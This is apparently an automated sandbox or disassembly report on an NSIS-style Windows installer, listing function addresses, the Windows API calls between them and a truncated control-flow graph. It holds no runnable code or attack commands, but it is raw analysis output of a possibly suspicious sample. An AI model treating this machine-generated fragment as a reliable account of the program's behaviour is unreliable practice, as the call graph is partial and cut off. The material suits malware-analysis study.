lstrcpynW 4811->4832 4813 4041d0 lstrlenW 4814 40640a 17 API calls 4813->4814 4815 4041e6 SetWindowTextW 4814->4815 4816 401389 2 API calls 4815->4816 4816->4793 4817->4773 4818 404244 CreateDialogParamW 4817->4818 4818->4773 4819 404277 4818->4819 4820 40435f 18 API calls 4819->4820 4821 404282 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4820->4821 4822 401389 2 API calls 4821->4822 4823 4042c8 4822->4823 4823->4772 4824 4042d0 ShowWindow 4823->4824 4825 4043ab SendMessageW 4824->4825 4826 4042e8 4825->4826 4826->4773 4828 40640a 17 API calls 4827->4828 4829 40436a SetDlgItemTextW 4828->4829 4829->4802 4830->4806 4831->4811 4832->4813 4834 404345 SendMessageW 4833->4834 4835 40433f 4833->4835 4834->4792 4835->4834 4837 404489 4836->4837 4838 4043de GetWindowLongW 4836->4838 4837->4772 4838->4837 4839 4043f3 4838->4839 4839->4837 4840 404420 GetSysColor 4839->4840 4841 404423 4839->4841 4840->4841 4842 404433 SetBkMode 4841->4842 4843 404429 SetTextColor 4841->4843 4844 404451 4842->4844 4845 40444b GetSysColor 4842->4845 4843->4842 4846 404462 4844->4846 4847 404458 SetBkColor 4844->4847 4845->4844 4846->4837 4848 404475 DeleteObject 4846->4848 4849 40447c CreateBrushIndirect 4846->4849 4847->4846 4848->4849 4849->4837 5642 401f06 5643 402c41 17 API calls 5642->5643 5644 401f0c 5643->5644 5645 405450 24 API calls 5644->5645 5646 401f16 5645->5646 5647 4059d1 2 API calls 5646->5647 5648 401f1c 5647->5648 5649 401f3f CloseHandle 5648->5649 5650 406873 5 API calls 5648->5650 5652 40288b 5648->5652 5649->5652 5653 401f31 5650->5653 5653->5649 5655 40632f wsprintfW 5653->5655 5655->5649 5656 404809 5657 404819 5656->5657 5658 40483f 5656->5658 5659 40435f 18 API calls 5657->5659 5660 4043c6 8 API calls 5658->5660 5661 404826 SetDlgItemTextW 5659->5661 5662 40484b 5660->5662 5661->5658 5663 40190c 5664 401943 5663->5664 5665 402c41 17 API calls 5664->5665 5666 401948 5665->5666 5667 405afa 67 API calls 5666->5667 5668 401951 5667->5668 5669 40230c 5670 402314 5669->5670 5672 40231a 5669->5672 5671 402c41 17 API calls 5670->5671 5671->5672 5673 402328 5672->5673 5674 402c41 17 API calls 5672->5674 5675 402336 5673->5675 5676 402c41 17 API calls 5673->5676 5674->5673 5677 402c41 17 API calls 5675->5677 5676->5675 5678 40233f WritePrivateProfileStringW 5677->5678 5679 6cf1103d 5682 6cf1101b 5679->5682 5683 6cf11516 GlobalFree 5682->5683 5684 6cf11020 5683->5684 5685 6cf11024 5684->5685 5686 6cf11027 GlobalAlloc 5684->5686 5687 6cf1153d 3 API calls 5685->5687 5686->5685 5688 6cf1103b 5687->5688 5689 401f8c 5690 402c41 17 API calls 5689->5690 5691 401f93 5690->5691 5692 4067c2 5 API calls 5691->5692 5693 401fa2 5692->5693 5694 401fbe GlobalAlloc 5693->5694 5696 402026 5693->5696 5695 401fd2 5694->5695 5694->5696 5697 4067c2 5 API calls 5695->5697 5698 401fd9 5697->5698 5699 4067c2 5 API calls 5698->5699 5700 401fe3 5699->5700 5700->5696 5704 40632f wsprintfW 5700->5704 5702 402018 5705 40632f wsprintfW 5702->5705 5704->5702 5705->5696 4951 40238e 4952 4023c1 4951->4952 4953 402396 4951->4953 4954 402c41 17 API calls 4952->4954 4955 402c81 17 API calls 4953->4955 4956 4023c8 4954->4956 4957 40239d 4955->4957 4963 402cff 4956->4963 4959 4023a7 4957->4959 4960 4023d5 4957->4960 4961 402c41 17 API calls 4959->4961 4962 4023ae RegDeleteValueW RegCloseKey 4961->4962 4962->4960 4964 402d13 4963->4964 4965 402d0c 4963->4965 4964->4965 4967 402d44 4964->4967 4965->4960 4968 406255 RegOpenKeyExW 4967->4968 4969 402d72 4968->4969 4970 402dec 4969->4970 4972 402d76 4969->4972 4970->4965 4971 402d98 RegEnumKeyW 4971->4972 4973 402daf RegCloseKey 4971->4973 4972->4971 4972->4973 4974 402dd0 RegCloseKey 4972->4974 4976 402d44 6 API calls 4972->4976 4975 4067c2 5 API calls 4973->4975 4974->4970 4977 402dbf 4975->4977 4976->4972 4978 402de0 RegDeleteKeyW 4977->4978 4979 402dc3 4977->4979 4978->4970 4979->4970 5706 40190f 5707 402c41 17 API calls 5706->5707 5708 401916 5707->5708 5709 405a4e MessageBoxIndirectW 5708->5709 5710 40191f 5709->5710 5711 40558f 5712 4055b0 GetDlgItem GetDlgItem GetDlgItem 5711->5712 5713 405739 5711->5713 5756 404394 SendMessageW 5712->5756 5715 405742 GetDlgItem CreateThread CloseHandle 5713->5715 5716 40576a 5713->5716 5715->5716 5718 405795 5716->5718 5720 405781 ShowWindow ShowWindow 5716->5720 5721 4057ba 5716->5721 5717 405620 5725 405627 GetClientRect GetSystemMetrics SendMessageW SendMessageW 5717->5725 5719 4057f5 5718->5719 5722 4057a9 5718->5722 5723 4057cf ShowWindow 5718->5723 5719->5721 5733 405803 SendMessageW 5719->5733 5758 404394 SendMessageW 5720->5758 5724 4043c6 8 API calls 5721->5724 5727 404338 SendMessageW 5722->5727 5729 4057e1 5723->5729 5730 4057ef 5723->5730 5728 4057c8 5724->5728 5731 405695 5725->5731 5732 405679 SendMessageW SendMessageW 5725->5732 5727->5721 5734 405450 24 API calls 5729->5734 5735 404338 SendMessageW 5730->5735 5736 4056a8 5731->5736 5737 40569a SendMessageW 5731->5737 5732->5731 5733->5728 5738 40581c CreatePopupMenu 5733->5738 5734->5730 5735->5719 5739 40435f 18 API calls 5736->5739 5737->5736 5740 40640a 17 API calls 5738->5740 5742 4056b8 5739->5742 5741 40582c AppendMenuW 5740->5741 5743 405849 GetWindowRect 5741->5743 5744 40585c TrackPopupMenu 5741->5744 5745 4056c1 ShowWindow 5742->5745 5746 4056f5 GetDlgItem SendMessageW 5742->5746 5743->5744 5744->5728 5747 405877 5744->5747 5748 4056e4 5745->5748 5749 4056d7 ShowWindow 5745->5749 5746->5728 5750 40571c SendMessageW SendMessageW 5746->5750 5751 405893 SendMessageW 5747->5751 5757 404394 SendMessageW 5748->5757 5749->5748 5750->5728 5751->5751 5752 4058b0 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5751->5752 5754 4058d5 SendMessageW 5752->5754 5754->5754 5755 4058fe GlobalUnlock SetClipboardData CloseClipboard 5754->5755 5755->5728 5756->5717 5757->5746 5758->5718 5759 401491 5760 405450 24 API calls 5759->5760 5761 401498 5760->5761 5769 401d14 5770 402c1f 17 API calls 5769->5770 5771 401d1b 5770->5771 5772 402c1f 17 API calls 5771->5772 5773 401d27 GetDlgItem 5772->5773 5774 402592 5773->5774 5775 402994 5776 402c1f 17 API calls 5775->5776 5777 4029ae 5776->5777 5778 4029d5 5777->5778 5779 4029ee 5777->5779 5784 40288b 5777->5784 5780 4029da 5778->5780 5781 4029eb 5778->5781 5782 402a08 5779->5782 5783 4029f8 5779->5783 5789 4063e8 lstrcpynW 5780->5789 5781->5784 5790 40632f wsprintfW 5781->5790 5786 40640a 17 API calls 5782->5786 5785 402c1f 17 API calls 5783->5785 5785->5781 5786->5781 5789->5784 5790->5784 5791 404495 lstrcpynW lstrlenW 5792 403a96 5793 403aa1 5792->5793 5794 403aa5 5793->5794 5795 403aa8 GlobalAlloc 5793->5795 5795->5794 5796 402598 5797 4025c7 5796->5797 5798 4025ac 5796->5798 5799 4025fb 5797->5799 5800 4025cc 5797->5800 5801 402c1f 17 API calls 5798->5801 5803 402c41 17 API calls 5799->5803 5802 402c41 17 API calls 5800->5802 5808 4025b3 5801->5808 5804 4025d3 WideCharToMultiByte lstrlenA 5802->5804 5805 402602 lstrlenW 5803->5805 5804->5808 5805->5808 5806 402645 5807 40262f 5807->5806 5809 405f90 WriteFile 5807->5809 5808->5806 5808->5807 5810 405fbf 5 API calls 5808->5810 5809->5806 5810->5807 5811 40451e 5812 404650 5811->5812 5813 404536 5811->5813 5814 4046ba 5812->5814 5815 404784 5812->5815 5822 40468b GetDlgItem SendMessageW 5812->5822 5817 40435f 18 API calls 5813->5817 5814->5815 5816 4046c4 GetDlgItem 5814->5816 5819 4043c6 8 API calls 5815->5819 5820 4046de 5816->5820 5821 404745 5816->5821 5818 40459d 5817->5818 5823 40435f 18 API calls 5818->5823 5824 40477f 5819->5824 5820->5821 5825 404704 SendMessageW LoadCursorW SetCursor 5820->5825 5821->5815 5826 404757 5821->5826 5844 404381 EnableWindow 5822->5844 5828 4045aa CheckDlgButton 5823->5828 5845 4047cd 5825->5845 5830 40476d 5826->5830 5831 40475d SendMessageW 5826->5831 5842 404381 EnableWindow 5828->5842 5830->5824 5836 404773 SendMessageW 5830->5836 5831->5830 5832 4046b5 5833 4047a9 SendMessageW 5832->5833 5833->5814 5836->5824 5837 4045c8 GetDlgItem 5843 404394 SendMessageW 5837->5843 5839 4045de SendMessageW 5840 404604 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5839->5840 5841 4045fb GetSysColor 5839->5841 5840->5824 5841->5840 5842->5837 5843->5839 5844->5832 5848 405a14 ShellExecuteExW 5845->5848 5847 404733 LoadCursorW SetCursor 5847->5821 5848->5847 5849 40149e 5850 4022f7 5849->5850 5851 4014ac PostQuitMessage 5849->5851 5851->5850 5852 401c1f 5853 402c1f 17 API calls 5852->5853 5854 401c26 5853->5854 5855 402c1f 17 API calls 5854->5855 5856 401c33 5855->5856 5857 401c48 5856->5857 5858 402c41 17 API calls 5856->5858 5859 401c58 5857->5859 5860 402c41 17 API calls 5857->5860 5858->5857 5861 401c63 5859->5861 5862 401caf 5859->5862 5860->5859 5864 402c1f 17 API calls 5861->5864 5863 402c41 17 API calls 5862->5863 5865 401cb4 5863->5865 5866 401c68 5864->5866 5867 402c41 17 API calls 5865->5867 5868 402c1f 17 API calls 5866->5868 5869 401cbd FindWindowExW 5867->5869 5870 401c74 5868->5870 5873 401cdf 5869->5873 5871 401c81 SendMessageTimeoutW 5870->5871 5872 401c9f SendMessageW 5870->5872 5871->5873 5872->5873 5874 402aa0 SendMessageW 5875 402aba InvalidateRect 5874->5875 5876 402ac5 5874->5876 5875->5876 5877 402821 5878 402827 5877->5878 5879 402ac5 5878->5879 5880 40282f FindClose 5878->5880 5880->5879 4362 6cf12993 4363 6cf129e3 4362->4363 4364 6cf129a3 VirtualProtect 4362->4364 4364->4363 5881 4015a3 5882 402c41 17 API calls 5881->5882 5883 4015aa SetFileAttributesW 5882->5883 5884 4015bc 5883->5884 4512 4034a5 SetErrorMode GetVersion 4513 4034e4 4512->4513 4514 4034ea 4512->4514 4515 4067c2 5 API calls 4513->4515 4516 406752 3 API calls 4514->4516 4515->4514 4517 403500 lstrlenA 4516->4517 4517->4514 4518 403510 4517->4518 4519 4067c2 5 API calls 4518->4519 4520 403517 4519->4520 4521 4067c2 5 API calls 4520->4521 4522 40351e 4521->4522 4523 4067c2 5 API calls 4522->4523 4524 40352a #17 OleInitialize SHGetFileInfoW 4523->4524 4602 4063e8 lstrcpynW 4524->4602 4527 403576 GetCommandLineW 4603 4063e8 lstrcpynW 4527->4603 4529 403588 4530 405cea CharNextW 4529->4530 4531 4035ad CharNextW 4530->4531 4532 4036d7 GetTempPathW 4531->4532 4538 4035c6 4531->4538 4604 403474 4532->4604 4534 4036ef 4535 4036f3 GetWindowsDirectoryW lstrcatW 4534->4535 4536 403749 DeleteFileW 4534->4536 4539 403474 12 API calls 4535->4539 4614 402f30 GetTickCount GetModuleFileNameW 4536->4614 4540 405cea CharNextW 4538->4540 4544 4036c0 4538->4544 4546 4036c2 4538->4546 4542 40370f 4539->4542 4540->4538 4541 40375d 4548 405cea CharNextW 4541->4548 4584 403800 4541->4584 4597 403810 4541->4597 4542->4536 4543 403713 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 4542->4543 4547 403474 12 API calls 4543->4547 4544->4532 4700 4063e8 lstrcpynW 4546->4700 4552 403741 4547->4552 4557 40377c 4548->4557 4552->4536 4552->4597 4553 40394a 4555 403952 GetCurrentProcess OpenProcessToken 4553->4555 4556 4039ce ExitProcess 4553->4556 4554 40382a 4712 405a4e 4554->4712 4559 40396a LookupPrivilegeValueW AdjustTokenPrivileges 4555->4559 4560 40399e 4555->4560 4562 403840 4557->4562 4563 4037da 4557->4563 4559->4560 4565 4067c2 5 API calls 4560->4565 4567 4059b9 5 API calls 4562->4567 4566 405dc5 18 API calls 4563->4566 4569 4039a5 4565->4569 4570 4037e6 4566->4570 4568 403845 lstrcatW 4567->4568 4571 403861 lstrcatW lstrcmpiW 4568->4571 4572 403856 lstrcatW 4568->4572 4573 4039ba ExitWindowsEx 4569->4573 4576 4039c7 4569->4576 4570->4597 4701 4063e8 lstrcpynW 4570->4701 4575 40387d 4571->4575 4571->4597 4572->4571 4573->4556 4573->4576 4578 403882 4575->4578 4579 403889 4575->4579 4580 40140b 2 API calls 4576->4580 4577 4037f5 4702 4063e8 lstrcpynW 4577->4702 4582 40591f 4 API calls 4578->4582 4583 40599c 2 API calls 4579->4583 4580->4556 4585 403887 4582->4585 4586 40388e SetCurrentDirectoryW 4583->4586 4644 403ad8 4584->4644 4585->4586 4587 4038a9 4586->4587 4588 40389e 4586->4588 4717 4063e8 lstrcpynW 4587->4717 4716 4063e8 lstrcpynW 4588->4716 4591 40640a 17 API calls 4592 4038e8 DeleteFileW 4591->4592 4593 4038f5 CopyFileW 4592->4593 4599 4038b7 4592->4599 4593->4599 4594 40393e 4596 4061ae 36 API calls 4594->4596 4595 4061ae 36 API calls 4595->4599 4596->4597 4703 4039e6 4597->4703 4598 40640a 17 API calls 4598->4599 4599->4591 4599->4594 4599->4595 4599->4598 4601 403929 CloseHandle 4599->4601 4718 4059d1 CreateProcessW 4599->4718 4601->4599 4602->4527 4603->4529 4605 40667c 5 API calls 4604->4605 4607 403480 4605->4607 4606 40348a 4606->4534 4607->4606 4608 405cbd 3 API calls 4607->4608 4609 403492 4608->4609 4610 40599c 2 API calls 4609->4610 4611 403498 4610->4611 4721 405f0d 4611->4721 4725 405ede GetFileAttributesW CreateFileW 4614->4725 4616 402f73 4643 402f80 4616->4643 4726 4063e8 lstrcpynW 4616->4726 4618 402f96 4619 405d09 2 API calls 4618->4619 4620 402f9c 4619->4620 4727 4063e8 lstrcpynW 4620->4727 4622 402fa7 GetFileSize 4623 4030a8 4622->4623 4624 402fbe 4622->4624 4625 402e8e 32 API calls 4623->4625 4624->4623 4626 403447 ReadFile 4624->4626 4628 403143 4624->4628 4635 402e8e 32 API calls 4624->4635 4624->4643 4627 4030af 4625->4627 4626->4624 4629 4030eb GlobalAlloc 4627->4629 4627->4643 4729 40345d SetFilePointer 4627->4729 4632 402e8e 32 API calls 4628->4632 4631 403102 4629->4631 4636 405f0d 2 API calls 4631->4636 4632->4643 4633 4030cc 4634 403447 ReadFile 4633->4634 4637 4030d7 4634->4637 4635->4624 4638 403113 CreateFileW 4636->4638 4637->4629 4637->4643 4639 40314d 4638->4639 4638->4643 4728 40345d SetFilePointer 4639->4728 4641 40315b 4642 4031d6 44 API calls 4641->4642 4642->4643 4643->4541 4645 4067c2 5 API calls 4644->4645 4646 403aec 4645->4646 4647 403af2 4646->4647 4648 403b04 4646->4648 4738 40632f wsprintfW 4647->4738 4649 4062b6 3 API calls 4648->4649 4650 403b34 4649->4650 4652 403b53 lstrcatW 4650->4652 4654 4062b6 3 API calls 4650->4654 4653 403b02 4652->4653 4730 403dae 4653->4730 4654->4652 4657 405dc5 18 API calls 4658 403b85 4657->4658 4659 403c19 4658->4659 4661 4062b6 3 API calls 4658->4661 4660 405dc5 18 API calls 4659->4660 4662 403c1f 4660->4662 4663 403bb7 4661->4663 4664 403c2f LoadImageW 4662->4664 4665 40640a 17 API calls 4662->4665 4663->4659 4668 403bd8 lstrlenW 4663->4668 4672 405cea CharNextW 4663->4672 4666 403cd5 4664->4666 4667 403c56 RegisterClassW 4664->4667 4665->4664 4670 40140b 2 API calls 4666->4670 4669 403c8c SystemParametersInfoW CreateWindowExW 4667->4669 4699 403cdf 4667->4699 4673 403be6 lstrcmpiW 4668->4673 4674 403c0c 4668->4674 4669->4666 4671 403cdb 4670->4671 4678 403dae 18 API calls 4671->4678 4671->4699 4676 403bd5 4672->4676 4673->4674 4677 403bf6 GetFileAttributesW 4673->4677 4675 405cbd 3 API calls 4674->4675 4679 403c12 4675->4679 4676->4668 4680 403c02 4677->4680 4682 403cec 4678->4682 4739 4063e8 lstrcpynW 4679->4739 4680->4674 4681 405d09 2 API calls 4680->4681 4681->4674 4684 403cf8 ShowWindow 4682->4684 4685 403d7b 4682->4685 4687 406752 3 API calls 4684->4687 4740 405523 OleInitialize 4685->4740 4689 403d10 4687->4689 4688 403d81 4690 403d85 4688->4690 4691 403d9d 4688->4691 4692 403d1e GetClassInfoW 4689->4692 4694 406752 3 API calls 4689->4694 4697 40140b 2 API calls 4690->4697 4690->4699 4693 40140b 2 API calls 4691->4693 4695 403d32 GetClassInfoW RegisterClassW 4692->4695 4696 403d48 DialogBoxParamW 4692->4696 4693->4699 4694->4692 4695->4696 4698 40140b 2 API calls 4696->4698 4697->4699 4698->4699 4699->4597 4700->4544 4701->4577 4702->4584 4704 403a01 4703->4704 4705 4039f7 CloseHandle 4703->4705 4706 403a15 4704->4706 4707 403a0b CloseHandle 4704->4707 4705->4704 4751 403a43 4706->4751 4707->4706 4710 405afa 67 API calls 4711 403819 OleUninitialize 4710->4711 4711->4553 4711->4554 4713 405a63 4712->4713 4714 403838 ExitProcess 4713->4714 4715 405a77 MessageBoxIndirectW 4713->4715 4715->4714 4716->4587 4717->4599 4719 405a10 4718->4719 4720 405a04 CloseHandle 4718->4720 4719->4599 4720->4719 4722 405f1a GetTickCount GetTempFileNameW 4721->4722 4723 405f50 4722->4723 4724 4034a3 4722->4724 4723->4722 4723->4724 4724->4534 4725->4616 4726->4618 4727->4622 4728->4641 4729->4633 4731 403dc2 4730->4731 4747 40632f wsprintfW 4731->4747 4733 403e33 4748 403e67 4733->4748 4735 403b63 4735->4657 4736 403e38 4736->4735 4737 40640a 17 API calls 4736->4737 4737->4736 4738->4653 4739->4659 4741 4043ab SendMessageW 4740->4741 4746 405546 4741->4746 4742 4043ab SendMessageW 4743 40557f OleUninitialize 4742->4743 4743->4688 4744 401389 2 API calls 4744->4746 4745 40556d 4745->4742 4746->4744 4746->4745 4747->4733 4749 40640a 17 API calls 4748->4749 4750 403e75 SetWindowTextW 4749->4750 4750->4736 4752 403a51 4751->4752 4753 403a1a 4752->4753 4754 403a56 FreeLibrary GlobalFree 4752->4754 4753->4710 4754->4753 4754->4754 5885 404ba6 5886 404bd2 5885->5886 5887 404bb6 5885->5887 5889 404c05 5886->5889 5890 404bd8 SHGetPathFromIDListW 5886->5890 5896 405a32 GetDlgItemTextW 5887->5896 5892 404be8 5890->5892 5895 404bef SendMessageW 5890->5895 5891 404bc3 SendMessageW 5891->5886 5894 40140b 2 API calls 5892->5894 5894->5895 5895->5889 5896->5891 5918 401a30 5919 402c41 17 API calls 5918->5919 5920 401a39 ExpandEnvironmentStringsW 5919->5920 5921 401a4d 5920->5921 5923 401a60 5920->5923 5922 401a52 lstrcmpW 5921->5922 5921->5923 5922->5923 5924 6cf11000 5925 6cf1101b 5 API calls 5924->5925 5926 6cf11019 5925->5926 5031 402032 5032 402044 5031->5032 5033 4020f6 5031->5033 5034 402c41 17 API calls 5032->5034 5036 401423 24 API calls 5033->5036 5035 40204b 5034->5035 5037 402c41 17 API calls 5035->5037 5041 402250 5036->5041 5038 402054 5037->5038 5039 40206a LoadLibraryExW 5038->5039 5040 40205c GetModuleHandleW 5038->5040 5039->5033 5042 40207b 5039->5042 5040->5039 5040->5042 5054 406831 WideCharToMultiByte 5042->5054 5045 4020c5 5047 405450 24 API calls 5045->5047 5046 40208c 5048 402094 5046->5048 5049 4020ab 5046->5049 5051 40209c 5047->5051 5050 401423 24 API calls 5048->5050 5057 6cf11777 5049->5057 5050->5051 5051->5041 5052 4020e8 FreeLibrary 5051->5052 5052->5041 5055 40685b GetProcAddress 5054->5055 5056 402086 5054->5056 5055->5056 5056->5045 5056->5046 5058 6cf117aa 5057->5058 5099 6cf11b5f 5058->5099 5060 6cf117b1 5061 6cf118d6 5060->5061 5062 6cf117c2 5060->5062 5063 6cf117c9 5060->5063 5061->5051 5149 6cf12352 5062->5149 5133 6cf12394 5063->5133 5068 6cf1182d 5073 6cf11833 5068->5073 5074 6cf1187e 5068->5074 5069 6cf1180f 5162 6cf12569 5069->5162 5070 6cf117df 5072 6cf117e5 5070->5072 5078 6cf117f0 5070->5078 5082 6cf117ee 5072->5082 5143 6cf12aac 5072->5143 5181 6cf115c6 5073->5181 5076 6cf12569 10 API calls 5074->5076 5075 6cf117f8 5075->5082 5159 6cf12d37 5075->5159 5083 6cf1186f 5076->5083 5077 6cf11815 5173 6cf115b4 5077->5173 5153 6cf12724 5078->5153 5082->5068 5082->5069 5090 6cf118c5 5083->5090 5187 6cf1252c 5083->5187 5088 6cf117f6 5088->5082 5089 6cf12569 10 API calls 5089->5083 5090->5061 5094 6cf118cf GlobalFree 5090->5094 5094->5061 5096 6cf118b1 5096->5090 5191 6cf1153d wsprintfW 5096->5191 5097 6cf118aa FreeLibrary 5097->5096 5194 6cf1121b GlobalAlloc 5099->5194 5101 6cf11b83 5195 6cf1121b GlobalAlloc 5101->5195 5103 6cf11da9 GlobalFree GlobalFree GlobalFree 5104 6cf11dc6 5103->5104 5119 6cf11e10 5103->5119 5105 6cf12192 5104->5105 5113 6cf11ddb 5104->5113 5104->5119 5107 6cf121b4 GetModuleHandleW 5105->5107 5105->5119 5106 6cf11c64 GlobalAlloc 5125 6cf11b8e 5106->5125 5109 6cf121c5 LoadLibraryW 5107->5109 5110 6cf121da 5107->5110 5108 6cf11ccd GlobalFree 5108->5125 5109->5110 5109->5119 5202 6cf1161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5110->5202 5111 6cf11caf lstrcpyW 5112 6cf11cb9 lstrcpyW 5111->5112 5112->5125 5113->5119 5198 6cf1122c 5113->5198 5115 6cf1222c 5117 6cf12239 lstrlenW 5115->5117 5115->5119 5203 6cf1161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5117->5203 5118 6cf12064 5201 6cf1121b GlobalAlloc 5118->5201 5119->5060 5120 6cf121ec 5120->5115 5131 6cf12216 GetProcAddress 5120->5131 5122 6cf120ec 5122->5119 5128 6cf12134 lstrcpyW 5122->5128 5124 6cf12253 5124->5119 5125->5103 5125->5106 5125->5108 5125->5111 5125->5112 5125->5118 5125->5119 5125->5122 5126 6cf11d0b 5125->5126 5127 6cf11fa5 GlobalFree 5125->5127 5130 6cf1122c 2 API calls 5125->5130 5126->5125 5196 6cf1158f GlobalSize GlobalAlloc 5126->5196 5127->5125 5128->5119 5130->5125 5131->5115 5132 6cf1206d 5132->5060 5140 6cf123ac 5133->5140 5135 6cf124d5 GlobalFree 5136 6cf117cf 5135->5136 5135->5140 5136->5070 5136->5075 5136->5082 5137 6cf12454 GlobalAlloc WideCharToMultiByte 5137->5135 5138 6cf1247f GlobalAlloc CLSIDFromString 5138->5135 5139 6cf1122c GlobalAlloc lstrcpynW 5139->5140 5140->5135 5140->5137 5140->5138 5140->5139 5142 6cf1249e 5140->5142 5205 6cf112ba 5140->5205 5142->5135 5209 6cf126b8 5142->5209 5145 6cf12abe 5143->5145 5144 6cf12b63 EnumWindows 5148 6cf12b81 5144->5148 5145->5144 5147 6cf12c4d 5147->5082 5212 6cf12a56 5148->5212 5150 6cf12367 5149->5150 5151 6cf12372 GlobalAlloc 5150->5151 5152 6cf117c8 5150->5152 5151->5150 5152->5063 5157 6cf12754 5153->5157 5154 6cf12802 5156 6cf12808 GlobalSize 5154->5156 5158 6cf12812 5154->5158 5155 6cf127ef GlobalAlloc 5155->5158 5156->5158 5157->5154 5157->5155 5158->5088 5160 6cf12d42 5159->5160 5161 6cf12d82 GlobalFree 5160->5161 5216 6cf1121b GlobalAlloc 5162->5216 5164 6cf125ec MultiByteToWideChar 5169 6cf12573 5164->5169 5165 6cf1261f lstrcpynW 5165->5169 5166 6cf1260e StringFromGUID2 5166->5169 5167 6cf12632 wsprintfW 5167->5169 5168 6cf12656 GlobalFree 5168->5169 5169->5164 5169->5165 5169->5166 5169->5167 5169->5168 5170 6cf1268b GlobalFree 5169->5170 5171 6cf11272 2 API calls 5169->5171 5217 6cf112e1 5169->5217 5170->5077 5171->5169 5221 6cf1121b GlobalAlloc 5173->5221 5175 6cf115b9 5176 6cf115c6 2 API calls 5175->5176 5177 6cf115c3 5176->5177 5178 6cf11272 5177->5178 5179 6cf112b5 GlobalFree 5178->5179 5180 6cf1127b GlobalAlloc lstrcpynW 5178->5180 5179->5083 5180->5179 5182 6cf115d2 wsprintfW 5181->5182 5184 6cf115ff lstrcpyW 5181->5184 5186 6cf11618 5182->5186 5184->5186 5186->5089 5188 6cf1253a 5187->5188 5190 6cf11891 5187->5190 5189 6cf12556 GlobalFree 5188->5189 5188->5190 5189->5188 5190->5096 5190->5097 5192 6cf11272 2 API calls 5191->5192 5193 6cf1155e 5192->5193 5193->5090 5194->5101 5195->5125 5197 6cf115ad 5196->5197 5197->5126 5204 6cf1121b GlobalAlloc 5198->5204 5200 6cf1123b lstrcpynW 5200->5119 5201->5132 5202->5120 5203->5124 5204->5200 5206 6cf112c1 5205->5206 5207 6cf1122c 2 API calls 5206->5207 5208 6cf112df 5207->5208 5208->5140 5210 6cf126c6 VirtualAlloc 5209->5210 5211 6cf1271c 5209->5211 5210->5211 5211->5142 5213 6cf12a61 5212->5213 5214 6cf12a71 5213->5214 5215 6cf12a66 GetLastError 5213->5215 5214->5147 5215->5214 5216->5169 5218 6cf112ea 5217->5218 5219 6cf1130c 5217->5219 5218->5219 5220 6cf112f0 lstrcpyW 5218->5220 5219->5169 5220->5219 5221->5175 5932 402a35 5933 402c1f 17 API calls 5932->5933 5934 402a3b 5933->5934 5935 402a72 5934->5935 5936 40288b 5934->5936 5938 402a4d 5934->5938 5935->5936 5937 40640a 17 API calls 5935->5937 5937->5936 5938->5936 5940 40632f wsprintfW 5938->5940 5940->5936 5941 401735 5942 402c41 17 API calls 5941->5942 5943 40173c SearchPathW 5942->5943 5944 4029e6 5943->5944 5945 401757 5943->5945 5945->5944 5947 4063e8 lstrcpynW 5945->5947 5947->5944 5948 4014b8 5949 4014be 5948->5949 5950 401389 2 API calls 5949->5950 5951 4014c6 5950->5951 5952 401db9 GetDC 5953 402c1f 17 API calls 5952->5953 5954 401dcb GetDeviceCaps MulDiv ReleaseDC 5953->5954 5955 402c1f 17 API calls 5954->5955 5956 401dfc 5955->5956 5957 40640a 17 API calls 5956->5957 5958 401e39 CreateFontIndirectW 5957->5958 5959 402592 5958->5959 5960 40283b 5961 402843 5960->5961 5962 402847 FindNextFileW 5961->5962 5963 402859 5961->5963 5962->5963 5964 4029e6 5963->5964 5966 4063e8 lstrcpynW 5963->5966 5966->5964

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 7 4034ee 1->7 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 7->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 31 4035d5-4035d9 28->31 32 4035ce-4035d3 28->32 38 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->38 39 403749-403763 DeleteFileW call 402f30 29->39 33 4035e0-4035e4 31->33 34 4035db-4035df 31->34 32->31 32->32 36 4036a3-4036b0 call 405cea 33->36 37 4035ea-4035f0 33->37 34->33 52 4036b2-4036b3 36->52 53 4036b4-4036ba 36->53 41 4035f2-4035fa 37->41 42 40360b-403644 37->42 38->39 58 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 38->58 54 403814-403824 call 4039e6 OleUninitialize 39->54 55 403769-40376f 39->55 47 403601 41->47 48 4035fc-4035ff 41->48 49 403661-40369b 42->49 50 403646-40364b 42->50 47->42 48->42 48->47 49->36 57 40369d-4036a1 49->57 50->49 56 40364d-403655 50->56 52->53 53->28 59 4036c0 53->59 75 40394a-403950 54->75 76 40382a-40383a call 405a4e ExitProcess 54->76 60 403804-40380b call 403ad8 55->60 61 403775-403780 call 405cea 55->61 63 403657-40365a 56->63 64 40365c 56->64 57->36 65 4036c2-4036d0 call 4063e8 57->65 58->39 58->54 67 4036d5 59->67 74 403810 60->74 79 403782-4037b7 61->79 80 4037ce-4037d8 61->80 63->49 63->64 64->49 65->67 67->29 74->54 77 403952-403968 GetCurrentProcess OpenProcessToken 75->77 78 4039ce-4039d6 75->78 82 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 77->82 83 40399e-4039ac call 4067c2 77->83 85 4039d8 78->85 86 4039dc-4039e0 ExitProcess 78->86 84 4037b9-4037bd 79->84 87 403840-403854 call 4059b9 lstrcatW 80->87 88 4037da-4037e8 call 405dc5 80->88 82->83 102 4039ba-4039c5 ExitWindowsEx 83->102 103 4039ae-4039b8 83->103 91 4037c6-4037ca 84->91 92 4037bf-4037c4 84->92 85->86 100 403861-40387b lstrcatW lstrcmpiW 87->100 101 403856-40385c lstrcatW 87->101 88->54 99 4037ea-403800 call 